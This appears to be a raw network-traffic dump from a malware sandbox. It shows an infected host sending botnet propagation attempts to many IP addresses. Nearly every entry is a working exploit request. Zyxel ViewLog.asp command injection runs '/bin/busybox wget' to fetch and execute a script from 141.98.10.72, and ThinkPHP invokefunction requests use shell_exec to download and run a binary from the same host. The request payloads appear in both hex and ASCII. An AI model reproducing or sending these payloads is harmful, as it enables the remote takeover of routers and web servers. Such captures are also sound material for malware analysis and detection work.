                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:29:44.628748894 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:30:27.630714893 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            493192.168.2.234963831.200.30.2268080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:01.893587112 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            494192.168.2.235656862.29.34.1808080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:02.029551029 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            495192.168.2.233943085.158.57.498080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:02.611931086 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:29:03.241624117 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:29:03.449687958 CET396INHTTP/1.0 401 Authentication Required
                                                            WWW-Authenticate: Basic realm="proxy"
                                                            Connection: close
                                                            Content-type: text/html; charset=us-ascii
                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 31 20 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 52 65 71 75 69 72 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 34 30 31 20 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 52 65 71 75 69 72 65 64 3c 2f 68 32 3e 3c 68 33 3e 41 63 63 65 73 73 20 74 6f 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 64 69 73 61 6c 6c 6f 77 65 64 20 62 79 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 6f 72 20 79 6f 75 20 6e 65 65 64 20 76 61 6c 69 64 20 75 73 65 72 6e 61 6d 65 2f 70 61 73 73 77 6f 72 64 20 74 6f 20 75 73 65 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 3c 2f 68 33 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>401 Authentication Required</title></head><body><h2>401 Authentication Required</h2><h3>Access to requested resource disallowed by administrator or you need valid username/password to use this resource</h3></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            496192.168.2.234971295.217.53.108080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:03.842917919 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:29:04.061758041 CET498INHTTP/1.1 400 Bad Request
                                                            Date: Wed, 14 Feb 2024 08:29:03 GMT
                                                            Server: Apache/2.4.25 (Debian)
                                                            Content-Length: 304
                                                            Connection: close
                                                            Content-Type: text/html; charset=iso-8859-1
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 35 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 31 39 32 2e 31 36 38 2e 30 2e 31 34 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p><hr><address>Apache/2.4.25 (Debian) Server at 192.168.0.14 Port 80</address></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            497192.168.2.235911295.105.149.1018080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:03.843570948 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:29:04.064558029 CET404INHTTP/1.1 400 Bad Request
                                                            Date: Wed, 14 Feb 2024 08:29:03 GMT
                                                            Server: Apache
                                                            Content-Length: 226
                                                            Connection: close
                                                            Content-Type: text/html; charset=iso-8859-1
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            498192.168.2.236019431.136.51.2138080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:03.845633030 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:29:04.538350105 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:29:05.914220095 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:29:08.793741941 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:29:14.424953938 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:29:25.431504965 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:29:48.724332094 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:30:33.773854971 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            499192.168.2.233393831.200.99.1148080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:03.869661093 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            500192.168.2.2353494112.74.125.7580
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:04.014234066 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0
                                                            Feb 14, 2024 09:29:04.363006115 CET325INHTTP/1.1 400 Bad Request
                                                            Server: nginx
                                                            Date: Wed, 14 Feb 2024 08:29:04 GMT
                                                            Content-Type: text/html
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            Data Raw: 39 36 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: 96<html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>0


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            501192.168.2.234445031.220.92.1448080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:04.053399086 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            502192.168.2.235799285.66.44.208080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:04.104890108 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:29:04.338896036 CET274INHTTP/1.0 200 OK
                                                            Server: httpd/2.0
                                                            x-frame-options: SAMEORIGIN
                                                            x-xss-protection: 1; mode=block
                                                            Date: Wed, 14 Feb 2024 08:31:23 GMT
                                                            Content-Type: text/html
                                                            Connection: close
                                                            Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 73 63 72 69 70 74 3e 74 6f 70 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 27 2f 4d 61 69 6e 5f 4c 6f 67 69 6e 2e 61 73 70 27 3b 3c 2f 73 63 72 69 70 74 3e 0a 3c 2f 48 45 41 44 3e 3c 2f 48 54 4d 4c 3e 0a
                                                            Data Ascii: <HTML><HEAD><script>top.location.href='/Main_Login.asp';</script></HEAD></HTML>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            503192.168.2.233347494.120.39.2078080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:04.115314007 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            504192.168.2.234587495.100.233.3280
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:04.221535921 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0
                                                            Feb 14, 2024 09:29:04.429115057 CET480INHTTP/1.0 400 Bad Request
                                                            Server: AkamaiGHost
                                                            Mime-Version: 1.0
                                                            Content-Type: text/html
                                                            Content-Length: 258
                                                            Expires: Wed, 14 Feb 2024 08:29:04 GMT
                                                            Date: Wed, 14 Feb 2024 08:29:04 GMT
                                                            Connection: close
                                                            Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 35 63 37 65 31 39 62 38 26 23 34 36 3b 31 37 30 37 38 39 39 33 34 34 26 23 34 36 3b 34 32 36 32 61 30 38 38 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                            Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http&#58;&#47;&#47;&#37;5bNo&#37;20Host&#37;5d&#47;index&#46;php&#63;", is invalid.<p>Reference&#32;&#35;9&#46;5c7e19b8&#46;1707899344&#46;4262a088</BODY></HTML>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            505192.168.2.234202495.100.211.2780
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:04.240277052 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
